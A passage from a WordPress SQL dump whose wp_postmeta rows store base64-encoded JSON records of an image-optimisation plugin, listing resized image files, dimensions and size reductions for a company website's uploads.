XJpc29uLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTM3LCJpZCI6MjQ0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9rcnl0b3gtY29tcGFyaXNvbi01MTB4NDI1LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NDI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2tyeXRveC1jb21wYXJpc29uLTUxMHg0MjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwva3J5dG94LWNvbXBhcmlzb24tNTEweDQyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1MzksImlkIjoyNDQ0fV0='); 
INSERT INTO `wp_postmeta` VALUES (28818, 2443, 'wpfc_optimisation_reduction', '117074'); 
INSERT INTO `wp_postmeta` VALUES (28819, 2443, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLmpwZyIsIndpZHRoIjo1NTMsImhlaWdodCI6NTc2LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLmpwZyIsInJlZHVjdGlvbiI6MTE3MDY5LCJ0aW1lIjoxNDgzNTQ4NTQ3LCJpZCI6IjI0NDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODU0OSwiaWQiOjI0NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTUxLCJpZCI6MjQ0M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtSHlkcm9jYXJib24tMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9Lcnl0b3gtSHlkcm9jYXJib24tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9Lcnl0b3gtSHlkcm9jYXJib24tMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1NTMsImlkIjoyNDQzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0tyeXRveC1IeWRyb2NhcmJvbi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODU1NSwiaWQiOjI0NDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTUxMHg1NzYuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo1NzYsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTUxMHg1NzYuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvS3J5dG94LUh5ZHJvY2FyYm9uLTUxMHg1NzYuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTU4LCJpZCI6MjQ0M31d'); 
INSERT INTO `wp_postmeta` VALUES (28820, 2419, 'wpfc_optimisation_reduction', '1528586'); 
INSERT INTO `wp_postmeta` VALUES (28821, 2419, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQuanBnIiwid2lkdGgiOjM1NDEsImhlaWdodCI6MTk0MCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQuanBnIiwicmVkdWN0aW9uIjoxNTI4NTc4LCJ0aW1lIjoxNDgzNTQ4NTY4LCJpZCI6IjI0MTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODU3MSwiaWQiOjI0MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC04MDB4NDM4LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDM4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtODAweDQzOC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTgwMHg0MzguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTc0LCJpZCI6MjQxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTc2OHg0MjEuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0MjEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC03Njh4NDIxLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtNzY4eDQyMS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1NzcsImlkIjoyNDE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMTYwMHg4NzcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6ODc3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMTYwMHg4NzcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC0xNjAweDg3Ny5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1ODEsImlkIjoyNDE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODU4MywiaWQiOjI0MTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NTg1LCJpZCI6MjQxOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg1ODgsImlkIjoyNDE5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzEwMzY2MjQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzcxMDM2NjI0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MTAzNjYyNC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODU5MSwiaWQiOjI0MTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28822, 2399, 'wpfc_optimisation_reduction', '2706860'); 
INSERT INTO `wp_postmeta` VALUES (28823, 2399, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQuanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6MzUwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQuanBnIiwicmVkdWN0aW9uIjoyNzA2ODUyLCJ0aW1lIjoxNDgzNTQ4NjEwLCJpZCI6IjIzOTkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODYxMywiaWQiOjIzOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC04MDB4NDY3LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtODAweDQ2Ny5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTgwMHg0NjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NjE3LCJpZCI6MjM5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTc2OHg0NDguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0NDgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC03Njh4NDQ4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtNzY4eDQ0OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2MjAsImlkIjoyMzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMTYwMHg5MzMuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6OTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMTYwMHg5MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC0xNjAweDkzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2MjQsImlkIjoyMzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODYyOCwiaWQiOjIzOTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NjMwLCJpZCI6MjM5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2MzMsImlkIjoyMzk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTUyMjE0MDQtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjk1MjIxNDA0LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5NTIyMTQwNC01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODYzNywiaWQiOjIzOTl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28824, 2397, 'wpfc_optimisation_reduction', '337566'); 
